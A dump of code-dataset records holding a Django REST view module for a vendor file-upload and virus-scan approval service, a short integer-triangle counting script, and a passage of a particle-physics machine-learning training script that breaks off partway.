email\nfrom server.pj.models import File, Vendor, Stakeholder, DataSource, Note, Todo\nfrom server.pj.serializers import (FileSerializer, FileUploadSerializer,\n VendorSerializer, VendorValidateSerializer, StakeholderSerializer,\n DataSourceSerializer, NoteSerializer, TodoSerializer)\nfrom server.pj.store import upload, retrieve, create_folders\nfrom server.pj.permissions import get_permission_classes\nfrom server.pj.ordering import MappedOrderFilter\nfrom server.pj.throttles import get_throttle_classes\n\nlogger = logging.getLogger(__name__)\n\ndef parse_list(val):\n return val.split(',')\n\ndef validate_int(num):\n try:\n return int(num)\n except ValueError:\n return 0\n \nstatus_whitelist = [\n File.CLEAN,\n File.APPROVED,\n File.TRANSFERRED\n]\n\nstatus_email_notification = [\n File.QUARANTINED,\n File.FAILED\n]\n\nclass FileViewSet(\n FiltersMixin,\n mixins.ListModelMixin,\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n viewsets.GenericViewSet\n):\n \"\"\"View set to interact with the file model.\"\"\"\n permission_classes = get_permission_classes('pj', 'file', anon_actions=('upload',))\n serializer_class = FileSerializer\n queryset = File.objects.all().annotate(url=Concat(F('location'), Value('/'), F('status'), Value('/'), F('key'), output_field=CharField()))\n pagination_class = 
LimitOffsetPagination\n throttle_classes = get_throttle_classes('upload')\n filter_backends = (MappedOrderFilter,)\n filter_mappings = {\n 'code': 'vendor__code',\n 'name': 'name__icontains',\n 'location': 'location__icontains',\n 'status': 'status__in',\n 'size': 'size',\n 'url': 'url__icontains',\n 'vendor': 'vendor__name__icontains',\n 'submitter': 'submitter__icontains',\n 'date_uploaded_after': 'date_uploaded__gte',\n 'date_uploaded_before': 'date_uploaded__lte',\n 'date_approved_after': 'date_approved__gte',\n 'date_approved_before': 'date_approved__lte',\n 'key': 'key'\n }\n filter_value_transformations = {\n 'status': parse_list,\n 'size': validate_int\n }\n ordering_fields = ('name', 'location', 'size', 'vendor', 'submitter', 'date_uploaded', 'date_approved', 'status', 'url')\n ordering_mappings = {\n 'vendor': 'vendor__name'\n }\n ordering = ('-date_uploaded',)\n\n @action(\n detail=False,\n methods=['POST'],\n parser_classes=(MultiPartParser,),\n serializer_class=FileUploadSerializer)\n def upload(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n vendor = serializer.validated_data['vendor']\n submitter = serializer.validated_data['submitter']\n successful_urls = []\n names_changed = []\n for uploaded_file in serializer.validated_data['file']:\n # The s3 key needs to follow certain rules: https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html\n f = File.objects.create_file(uploaded_file, vendor, submitter)\n if f.name != uploaded_file.name:\n names_changed.append([uploaded_file.name, f.name])\n\n if f.location:\n try:\n url = f.get_url()\n upload(url, uploaded_file)\n successful_urls.append(url)\n except Exception as e:\n logger.error(f'Upload to {f.location} failed: {e}', extra={'request': request})\n f.delete()\n return Response('File upload failed', status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n else:\n logger.error('No upload location defined, skipping upload', extra={'request': request})\n f.message = 'No upload location defined, skipping upload'\n f.status = File.FAILED\n f.save()\n\n try:\n url_list = \"\\n\".join(successful_urls)\n body = f'Files uploaded successfully by {vendor.name} - {submitter}\\n\\n{url_list}'\n logger.info(body, extra={'request': request})\n poc_emails = [e for e in vendor.pocs.all().values_list('email', flat=True) if e]\n if not email(f'{len(successful_urls)} file(s) uploaded to puddle-jumper', body, poc_emails):\n logger.error('No emails were sent for file upload', extra={'request': request})\n except Exception as e:\n logger.error(f'Failed to send file upload email: {e}', extra={'request': request})\n\n return Response(names_changed, status=status.HTTP_202_ACCEPTED)\n\n @action(detail=True, methods=['GET'])\n def data(self, request, pk=None):\n f = self.get_object()\n if not f.status in status_whitelist:\n return Response('File has not been successfully virus scanned', status=status.HTTP_400_BAD_REQUEST)\n\n stream = retrieve(f.get_url())\n\n download = 'download' in request.query_params\n\n return FileResponse(stream, filename=f.name, as_attachment=download)\n\n @action(detail=True, methods=['POST'])\n def status(self, request, pk=None):\n \"\"\"\n This route is used by jumper cables to update the django file instance as it is processed\n \"\"\"\n f = self.get_object()\n file_status = request.data['status']\n if f.status == File.REJECTED:\n # If the file already has rejected status, move file appropriately\n f, s = f.reject(request, file_status)\n if not s:\n return 
Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n f = FileSerializer(f)\n return Response(f.data)\n\n message = request.data.get('message', None)\n data = {'status': file_status}\n if message is not None:\n data['message'] = message\n\n serializer = FileSerializer(f, data=data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n message = f'File {f.key} status change to {file_status}'\n logger.info(message, extra={'request': request})\n\n if file_status in status_email_notification:\n try:\n if not email(f'File {f.key} updated', message):\n logger.error('No emails were sent for status update', extra={'request': request})\n except Exception as e:\n # Think we just want to log an email failed and not return 500 status\n logger.error(f'Failed to send status update email: {e}', extra={'request': request})\n\n if file_status == File.CLEAN and f.vendor.approves(f):\n _, succeeded = f.approve(request)\n if not succeeded:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \n return Response(serializer.data)\n\n \n @action(detail=False, methods=['POST'])\n def retry_bulk(self, request):\n files = self.get_queryset().filter(pk__in=request.data, status__in=[File.FAILED, File.TRANSFERRED])\n if files.count() == 0:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n results = [f.reset(request) for f in files]\n succeeded = [f.pk for f, s in results if s]\n return Response({\n 'succeeded': succeeded,\n 'failed': [pk for pk in request.data if pk not in succeeded]\n }, status=status.HTTP_200_OK if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n @action(detail=True, methods=['POST'])\n def retry(self, request, pk=None):\n f = self.get_object()\n fragments = request.data\n if f.status not in [File.FAILED, File.TRANSFERRED]:\n return Response('File must have failed or transferred status to attempt a retry', status=status.HTTP_400_BAD_REQUEST)\n if f.status == File.TRANSFERRED:\n f.fragments = fragments\n f.save()\n\n f, succeeded = f.reset(request)\n if not succeeded:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['POST'])\n def approve_bulk(self, request):\n files = self.get_queryset().filter(pk__in=request.data, status=File.CLEAN)\n if files.count() == 0:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n results = [f.approve(request) for f in files]\n succeeded = [f.pk for f, s in results if s]\n return Response({\n 'succeeded': succeeded,\n 'failed': [pk for pk in request.data if pk not in succeeded]\n }, status=status.HTTP_200_OK if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n @action(detail=True, methods=['POST'])\n def approve(self, request, pk=None):\n f = self.get_object()\n if not f.status == File.CLEAN:\n return Response('File must have a Clean status to approve', status=status.HTTP_400_BAD_REQUEST)\n\n f, succeeded = f.approve(request)\n if not succeeded:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['POST'])\n def reject_bulk(self, request):\n files = self.get_queryset().filter(pk__in=request.data['pks'], status__in=[File.CLEAN, File.UNSCANNED])\n if files.count() == 0:\n return Response('File must have a clean or unscanned status to reject', status=status.HTTP_400_BAD_REQUEST)\n\n results = [f.reject(request) for f in files]\n succeeded = [f.pk for f, s in results if s]\n return Response({\n 
'succeeded': succeeded,\n 'failed': [pk for pk in request.data['pks'] if pk not in succeeded]\n }, status=status.HTTP_200_OK if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n @action(detail=True, methods=['POST'])\n def reject(self, request, pk=None):\n f = self.get_object()\n if f.status not in [File.CLEAN, File.UNSCANNED]:\n return Response('File must have a clean or unscanned status to reject', status=status.HTTP_400_BAD_REQUEST)\n\n f, succeeded = f.reject(request)\n if not succeeded:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['POST'])\n def delete_bulk(self, request):\n files = self.get_queryset().filter(pk__in=request.data)\n if files.count() == 0:\n return Response(status=status.HTTP_200_OK)\n \n results = [f.delete_file(request) for f in files]\n succeeded = [pk for pk, s in results if s]\n return Response({\n 'succeeded': succeeded,\n 'failed': [pk for pk in request.data if pk not in succeeded]\n }, status=status.HTTP_200_OK if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n def destroy(self, instance, pk=None):\n _, succeeded = self.get_object().delete_file(self.request)\n return Response(status=status.HTTP_204_NO_CONTENT if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n def perform_create(self, serializer):\n extra = {}\n if not serializer.validated_data.get('priority'):\n vendor = serializer.validated_data['vendor']\n extra['priority'] = vendor.priority\n serializer.save(**extra)\n\nclass StakeholderViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = Stakeholder.objects.all()\n serializer_class = StakeholderSerializer\n permission_classes = get_permission_classes('pj', 'stakeholder')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'name': 'name__icontains',\n 'phone': 'phone',\n 'email': 'email__icontains'\n }\n ordering_fields = ('name', 'phone', 'email')\n ordering = ('name',)\n\nclass VendorViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = Vendor.objects.all()\n serializer_class = VendorSerializer\n permission_classes = get_permission_classes('pj', 'vendor', anon_actions=('validate',))\n throttle_classes = get_throttle_classes('validate')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'name': 'name__icontains',\n 'code': 'code__icontains',\n 'date_added_after': 'date_added__gte',\n 'date_added_before': 'date_added__lte',\n 'file_count': 'file_count',\n 'pocs': 'pocs__name__icontains',\n 'auto_approve': 'auto_approve'\n }\n filter_value_transformations = {\n 'auto_approve': lambda x: x.lower() in ('true', 'yes')\n }\n ordering_fields = ('name', 'code', 'date_added', 'file_count', 'auto_approve')\n ordering = ('name',)\n\n def get_queryset(self):\n # Need to annotate queryset for ordering/filtering\n return self.queryset.annotate(file_count=Count('file'))\n\n def perform_create(self, serializer):\n if settings.UPLOAD_LOCATION:\n create_folders(settings.UPLOAD_LOCATION, serializer.validated_data['short_name'], File.STATUS_CHOICES)\n serializer.save()\n\n @action(\n detail=False,\n methods=['POST'],\n serializer_class=VendorValidateSerializer)\n def validate(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n return Response(Vendor.objects.filter(code__iexact=serializer.validated_data['code']).exists())\n\nclass 
DataSourceViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = DataSource.objects.all()\n serializer_class = DataSourceSerializer\n permission_classes = get_permission_classes('pj', 'datasource')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'name': 'name__icontains',\n 'status': 'status',\n 'priority': 'priority',\n 'theme': 'theme__icontains',\n 'info': 'info__icontains',\n 'date_ingest': 'date_ingest__icontains',\n }\n ordering_fields = ('name', 'status', 'priority', 'theme', 'info', 'date_ingest')\n ordering = ('name',)\n\n @action(detail=False, methods=['POST'])\n def delete_bulk(self, request):\n self.get_queryset().filter(pk__in=request.data).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['POST'])\n def suggestions(self, request):\n if not request.data.get('key') or not request.data.get('value'):\n Response(\"Need to submit a key and value\", status=status.HTTP_400_BAD_REQUEST)\n key = request.data['key']\n value = request.data['value']\n values = self.get_queryset() \\\n .filter(**{f'{key}__icontains': value}) \\\n .exclude(**{key:\"\"}) \\\n .distinct(key) \\\n .values_list(key, flat=True) \\\n [:10]\n return Response(values)\n\nclass NoteViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = Note.objects.all()\n serializer_class = NoteSerializer\n permission_classes = get_permission_classes('pj', 'note')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'note': 'note__icontains',\n 'source': 'data_source__pk'\n }\n ordering_fields = ('note',)\n ordering = ('note',)\n\n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user)\n\nclass TodoViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = Todo.objects.all()\n serializer_class = TodoSerializer\n permission_classes = get_permission_classes('pj', 'todo')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'text': 'text__icontains',\n }\n ordering_fields = ('text',)\n ordering = ('text',)\n\n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user)\n","sub_path":"server/pj/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"547542815","text":"import math\n\n\n# c^2 = a^2 + b^2 - 2*a*b*cos(c)\ndef give_triang(per):\n def isSqrt(x):\n y = math.sqrt(x)\n return int(y) if y == int(y) else None\n\n res = 0\n for a in range(1, per // 2):\n for b in range(a, per // 2):\n c = isSqrt(a ** 2 + b ** 2 + a * b)\n if c is not None and a + b + c <= per:\n res += 1\n return res\n\n\nprint(give_triang(80))\n","sub_path":"codewar/2021/5/Integer_triangles.py","file_name":"Integer_triangles.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"273361881","text":"import matplotlib\n\nmatplotlib.use('Agg')\nimport os\nimport pandas as pd\nimport numpy as np\nimport math\nfrom dfConvert import convertTree\n\nfrom pandasPlotting.Plotter import Plotter\nfrom pandasPlotting.dfFunctions import expandArrays\nfrom pandasPlotting.dtFunctions import featureImportance\nfrom MlClasses.MlData import MlData\nfrom MlClasses.Bdt import Bdt\nfrom MlClasses.Dnn import Dnn\nfrom MlClasses.ComparePerformances import ComparePerformances\n\nfrom 
MlFunctions.DnnFunctions import significanceLoss, significanceLossInvert, significanceFull, asimovSignificanceLoss, \\\n asimovSignificanceLossInvert, asimovSignificanceFull, truePositive, falsePositive\nfrom linearAlgebraFunctions import gram, addGramToFlatDF\nfrom root_numpy import rec2array\nimport argparse\n\n\"\"\"\nParse the arguments from the command line\n\"\"\"\nparser = argparse.ArgumentParser(description='Name of job')\nparser.add_argument('job_name', type=str, help='name of job to be executed') # str, not basestring: argparse needs an instantiable callable\nparser.add_argument('config_file_path', type=str, help='path to the configuration file')\n\nargs = parser.parse_args()\n\n# 1. Read the config file\n# 2. Parse the config file\n# 3. Assign each variable its correct value\n# 4. Put the paths for input/output/plotting/plotting type into the config\n\nnInputFiles = 100\nlimitSize = 400000 # Make this an integer N_events if you want to limit input\n\n# Use these to calculate the significance when it's used for training\n# Taken from https://twiki.cern.ch/twiki/bin/view/CMS/SummerStudent2017#SUSY\n# (dependent on batch size)\n\n\nlumi = 30. # luminosity in /fb\nexpectedSignal = 17.6 * 0.059 * lumi # cross section of stop sample in fb times efficiency measured by Marco\nexpectedBkgd = 844000. * 8.2e-4 * lumi # cross section of ttbar sample in fb times efficiency measured by Marco\nsystematic = 0.1 # systematic for the asimov significance\n\nmakeDfs = False\nsaveDfs = False # Save the dataframes if they're remade\n\nmakePlots = False\n\nprepareInputs = False\naddGramMatrix = False\n\n# ML options\nplotFeatureImportances = True\ndoBDT = False\ndoDNN = True\ndoCrossVal = True\nmakeLearningCurve = True\ndoGridSearch = True # if this is true do a grid search, if not use the configs\n\ndoRegression = True\nregressionVars = ['MT2W'] # ,'HT']\n\nnormalLoss = True\nsigLoss = True\nsigLossInvert = True\nasimovSigLoss = False\nasimovSigLossInvert = True\n\n# The first name of any object/file/data to be stored\nVORNAME = args.job_name\n\n# If not doing the grid search\ndnnConfigs = {\n # 'dnn':{'epochs':100,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn_batch128':{'epochs':40,'batch_size':128,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn_batch2048':{'epochs':40,'batch_size':2048,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n 'dnn_batch4096': {'epochs': 80, 'batch_size': 4096, 'dropOut': None, 'l2Regularization': None,\n 'hiddenLayers': [1.0]},\n # 'dnn_batch1024':{'epochs':40,'batch_size':1024,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn_batch8192':{'epochs':40,'batch_size':8192,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn2l':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0,1.0]},\n # 'dnn3l':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0]},\n # 'dnn3l_batch1024':{'epochs':40,'batch_size':1024,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0]},\n # 'dnn5l':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0,1.0,1.0]},\n # 'dnn_2p0n':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0]},\n # 'dnn2l_2p0n':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0,2.0]},\n # 'dnn3l_2p0n':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 
'dnn4l_2p0n':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0,2.0]},\n # 'dnn5l_2p0n':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0,2.0,2.0]},\n\n # 'dnn_l2Reg0p01':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[1.0]},\n # 'dnn2l_l2Reg0p01':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[1.0,1.0]},\n # 'dnn3l_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[1.0,1.0,1.0]},\n # 'dnn5l_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[1.0,1.0,1.0,1.0,1.0]},\n # 'dnn2l_2p0n_l2Reg0p01':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[2.0,2.0]},\n # 'dnn3l_2p0n_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn4l_2p0n_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[2.0,2.0,2.0,2.0]},\n # 'dnn5l_2p0n_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[2.0,2.0,2.0,2.0,2.0]},\n\n # 'dnndo0p5':{'epochs':10,'batch_size':32,'dropOut':0.5,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn2ldo0p5':{'epochs':10,'batch_size':32,'dropOut':0.5,'l2Regularization':None,'hiddenLayers':[1.0,0.5]},\n # 'dnndo0p2':{'epochs':30,'batch_size':32,'dropOut':0.2,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn2ldo0p2':{'epochs':30,'batch_size':32,'dropOut':0.2,'l2Regularization':None,'hiddenLayers':[1.0,1.0]},\n # 'dnn3ldo0p2':{'epochs':30,'batch_size':32,'dropOut':0.2,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0]},\n # 'dnnSmall':{'epochs':20,'batch_size':32,'dropOut':None,'l2Regularization':None,'l2Regularization':None,'hiddenLayers':[0.3]},\n # 'dnn2lSmall':{'epochs':20,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[0.66,0.3]},\n # 'dnn3lSmall':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[0.66,0.5,0.3]},\n\n # Bests\n # 4 vector\n # 'dnn3l_2p0n_do0p25':{'epochs':40,'batch_size':32,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn3l_2p0n_do0p25_batch128':{'epochs':40,'batch_size':128,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn3l_2p0n_do0p25_batch1024':{'epochs':40,'batch_size':1024,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn3l_2p0n_do0p25_batch2048':{'epochs':40,'batch_size':2048,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n 'dnn3l_2p0n_do0p25_batch4096': {'epochs': 80, 'batch_size': 4096, 'dropOut': 0.25, 'l2Regularization': None,\n 'hiddenLayers': [2.0, 2.0, 2.0]},\n # 'dnn3l_2p0n_do0p25_batch8192':{'epochs':40,'batch_size':8192,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn5l_1p0n_do0p25':{'epochs':40,'batch_size':32,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0,1.0,1.0]},\n # 'dnn4l_2p0n_do0p25':{'epochs':40,'batch_size':32,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0,2.0]},\n # 'dnn2lWide':{'epochs':30,'batch_size':32,'dropOut':0.25,'hiddenLayers':[2.0,2.0]},\n}\n\n\n# If doing the grid search\ndef hiddenLayerGrid(nLayers, nNodes):\n hlg = []\n for nn in nNodes:\n for nl in nLayers:\n hlg.append([nn for x in range(nl)])\n pass\n return hlg\n\n\ndnnGridParams = dict(\n mlp__epochs=[10, 20, 50],\n 
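# grid-size note: hiddenLayerGrid([1, 2, 3, 4, 5], [2.0, 1.0, 0.5]) below\n # yields 15 layouts, so 3 epoch choices x 2 batch sizes x 15 layouts x 3\n # dropOut settings = 270 fits before any k-fold repetition\n 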
mlp__batch_size=[32, 64],\n mlp__hiddenLayers=hiddenLayerGrid([1, 2, 3, 4, 5], [2.0, 1.0, 0.5]),\n mlp__dropOut=[None, 0.25, 0.5],\n # mlp__activation=['relu','sigmoid','tanh'],\n # mlp__optimizer=['adam','sgd','rmsprop'],\n ## NOT IMPLEMENTED YET:\n # mlp__learningRate=[0.5,1.0],\n # mlp__weightConstraint=[1.0,3.0,5.0]\n)\n\nbdtGridParams = dict(\n base_estimator__max_depth=[3, 5],\n base_estimator__min_samples_leaf=[0.05, 0.2],\n n_estimators=[400, 800]\n)\n\nif __name__ == '__main__':\n\n #############################################################\n # Either make the dataframes fresh from the trees or just read them in\n if makeDfs:\n print(\"Making DataFrames\")\n\n signalFile = [] # '/nfs/dust/cms/group/susy-desy/marco/training_sample_new/stop_sample_0.root'\n bkgdFile = [] # '/nfs/dust/cms/group/susy-desy/marco/training_sample_new/top_sample_0.root'\n\n for i in range(nInputFiles):\n signalFile.append(\n '/nfs/dust/cms/user/dydukhle/DelphesPythia8/Delphes-3.4.1/trainting_samples/stop_samples_' + str(\n i) + '.root')\n bkgdFile.append(\n '/nfs/dust/cms/group/susy-desy/marco/backup/training_samples/top_sample_' + str(i) + '.root')\n\n signal = convertTree(signalFile, signal=True, passFilePath=True, tlVectors=['selJet', 'sel_lep'])\n bkgd = convertTree(bkgdFile, signal=False, passFilePath=True, tlVectors=['selJet', 'sel_lep'])\n\n # #Expand the variables to 1D\n signal = expandArrays(signal)\n bkgd = expandArrays(bkgd)\n\n if saveDfs:\n print('Saving the dataframes')\n # Save the dfs?\n if not os.path.exists('dfs'): os.makedirs('dfs')\n signal.to_pickle('dfs/_signal.pkl')\n bkgd.to_pickle('dfs/_bkgd.pkl')\n else:\n print(\"Loading DataFrames\")\n\n signal = pd.read_pickle('dfs/_signal.pkl')\n bkgd = pd.read_pickle('dfs/_bkgd.pkl')\n \"\"\"\n Makes the plots \n \"\"\"\n if makePlots:\n print(\"Making plots\")\n # Skip out excessive jet info\n exceptions = []\n for k in signal.keys():\n if 'selJet' in k or '_x' in k or '_y' in k or '_z' in k:\n exceptions.append(k)\n signalPlotter = Plotter(signal.copy(), 'testPlots/signal', exceptions=exceptions)\n bkgdPlotter = Plotter(bkgd.copy(), 'testPlots/bkgd', exceptions=exceptions)\n\n signalPlotter.plotAllHists1D(withErrors=True)\n signalPlotter.correlations()\n bkgdPlotter.plotAllHists1D(withErrors=True)\n bkgdPlotter.correlations()\n pass\n\n #############################################################\n # Carry out the organisation of the inputs or read them in if it's already done\n if prepareInputs:\n # Put the data in a format for the machine learning: \n # combine signal and background with an extra column indicating which it is\n\n signal['signal'] = 1\n bkgd['signal'] = 0\n\n combined = pd.concat([signal, bkgd])\n\n # Now add the relevant variables to the DFs (make gram matrix)\n\n # Make a matrix of J+L x J+L where J is the number of jets and L is the number of leptons\n # Store it as a numpy matrix in the dataframe\n\n # METHOD 1:\n # Store as a matrix in the numpy array\n # It's better for it to be flat for machine learning... 
so using method 2\n\n # Use function that takes (4x) arrays of objects (for E,px,py,pz) and returns matrix\n # Must store it as an array of arrays as 2D numpy objects can't be stored in pandas\n\n # print 'm',signal['selJet_m'][0]+signal['sel_lep_m'][0]\n # signal['gram'] = signal.apply(lambda row: gram(row['sel_lep_e']+[row['MET']]+row['selJet_e'],\\\n # row['sel_lep_px']+[row['MET']*math.cos(row['METPhi'])]+row['selJet_px'],\\\n # row['sel_lep_py']+[row['MET']*math.sin(row['METPhi'])]+row['selJet_py'],\\\n # row['sel_lep_pz']+[0]+row['selJet_pz']),axis=1)\n #\n # bkgd['gram'] = bkgd.apply(lambda row: gram(row['sel_lep_e']+[row['MET']]+row['selJet_e'],\\\n # row['sel_lep_px']+[row['MET']*math.cos(row['METPhi'])]+row['selJet_px'],\\\n # row['sel_lep_py']+[row['MET']*math.sin(row['METPhi'])]+row['selJet_py'],\\\n # row['sel_lep_pz']+[0]+row['selJet_pz']),axis=1)\n\n # METHOD 2:\n # Put MET into the same format as the other objects\n if addGramMatrix:\n print('Producing GRAM matrix')\n combined['MET_e'] = combined['MET']\n combined['MET_px'] = combined['MET'] * np.cos(combined['METPhi'])\n combined['MET_py'] = combined['MET'] * np.sin(combined['METPhi'])\n combined['MET_pz'] = 0\n combined = combined.drop('MET', axis=1) # Drop the duplicate once the components are built (drop returns a copy)\n nSelLep = 0\n nSelJet = 0\n for k in combined.keys():\n if 'sel_lep_px' in k: nSelLep += 1\n if 'selJet_px' in k: nSelJet += 1\n addGramToFlatDF(combined, single=['MET'], multi=[['sel_lep', nSelLep], ['selJet', nSelJet]])\n\n # if saveDfs:\n print('Saving prepared files')\n combined.to_pickle('dfs/_combined.pkl')\n else:\n combined = pd.read_pickle('dfs/_combined.pkl')\n\n # Now carry out machine learning (with some algo specific diagnostics)\n # Choose the variables to train on\n\n chosenVars = {\n # Just the gram matrix, with or without b info\n # 'gram':['signal','gram'],\n #\n # 'gramBL':['signal','gram','selJetB','lep_type'],\n #\n # 'gramMT':['signal','gram','MT'],\n #\n # 'gramMT2W':['signal','gram','MT2W'],\n #\n # 'gramHT':['signal','gram','HT'],\n #\n # #The 4 vectors only\n # 'fourVector':['signal',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET'],\n #\n # 'fourVectorBL':['signal','lep_type','selJetB',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET'],\n #\n # 'fourVectorMT':['signal',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET','MT'],\n #\n # 'fourVectorMT2W':['signal',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET','MT2W'],\n #\n # 'fourVectorHT':['signal',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET','HT'],\n #\n # #A vanilla analysis with HL variables and lead 3 jets\n 'vanilla': ['signal', 'HT', 'MET', 'MT', 'MT2W', 'n_jet', 'lep_type',\n 'n_bjet', 'sel_lep_pt', 'sel_lep_eta', 'sel_lep_phi',\n 'selJet_phi0', 'selJet_pt0', 'selJet_eta0', 'selJet_m0',\n 'selJet_phi1', 'selJet_pt1', 'selJet_eta1', 'selJet_m1',\n 'selJet_phi2', 'selJet_pt2', 'selJet_eta2', 'selJet_m2'],\n\n }\n\n trainedModels = {}\n\n for varSetName, varSet in chosenVars.iteritems():\n\n # Pick out the expanded arrays\n columnsInDataFrame = []\n for k in combined.keys():\n for v in varSet:\n # Little trick to ensure only the start of the string is checked\n if ' ' + v in ' ' + k: columnsInDataFrame.append(k)\n\n # Select just the features we're interested in\n # For now setting NaNs to 0 for compatibility\n combinedToRun = combined[columnsInDataFrame].copy()\n combinedToRun.fillna(0, inplace=True)\n\n #############################################################\n # Now that everything is ready we can start the machine learning\n\n if plotFeatureImportances:\n print('Making feature importances')\n # Find the feature importance with a random forest classifier\n featureImportance(combinedToRun, 'signal', 'testPlots/mlPlots/' + varSetName + '/featureImportance')\n\n print('Splitting up data')\n\n mlData = MlData(combinedToRun, 'signal')\n\n # Now split pseudorandomly into training and testing\n # Split the development set into training and testing\n # (forgetting about evaluation for now)\n\n mlData.prepare(evalSize=0.2, testSize=0.2, limitSize=limitSize)\n\n if doBDT:\n\n if doGridSearch:\n print('Running BDT grid search')\n 